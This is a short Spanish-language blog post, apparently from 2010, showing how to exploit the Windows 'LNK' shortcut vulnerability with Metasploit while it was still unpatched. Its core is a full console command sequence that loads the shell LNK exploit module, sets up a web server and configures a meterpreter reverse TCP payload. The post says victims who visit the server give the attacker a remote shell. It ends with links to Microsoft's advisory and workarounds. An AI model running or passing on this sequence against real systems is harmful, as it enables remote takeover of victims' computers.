Explotando "LNK" con Metasploit - Método 1

[*] - Explotando "LNK" con Metasploit - Método 1
[*] - Explotando "LNK" con Metasploit - Método 2

Metasploit nuevamente tiene un PoC para una vulnerabilidad que todavía no posee un parche de corrección de Microsoft.

Para testear esta vulnerabilidad primero debemos actualizar el framework con "svn update", y luego hacemos lo siguiente:

use windows/browser/ms10_xxx_windows_shell_lnk_execute set SRVHOST 192.168.162.136 set SRVPORT 80 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.162.136 set LPORT 443 exploit

De esta forma vamos a levantar un servidor web en el puerto 80, que cuando la víctima lo visite, nos dará una shell de meterpreter a través del puerto 443. Funciona muy bien!

Todavía no hay un parche de seguridad de Microsoft para corregir este problema, pero pueden encontrar algunos workarounds a continuación:
[*] Microsoft Security Advisory (2286198)
[*] Security By Default: Solución a la vulnerabilidad "LNK" de Windows mediante Directivas de Restricción de Software

Información extraída de:
http://www.kungfoosion.com/2010/07/explotando-lnk-con-metasploit.html

Entradas populares de este blog

Trinity Rescue Kit: Tutorial para eliminar la contraseña de administrador en Windows

Cómo extraer el handshake WPA/WPA2 de archivos de captura grandes

HTTP Fingerprinting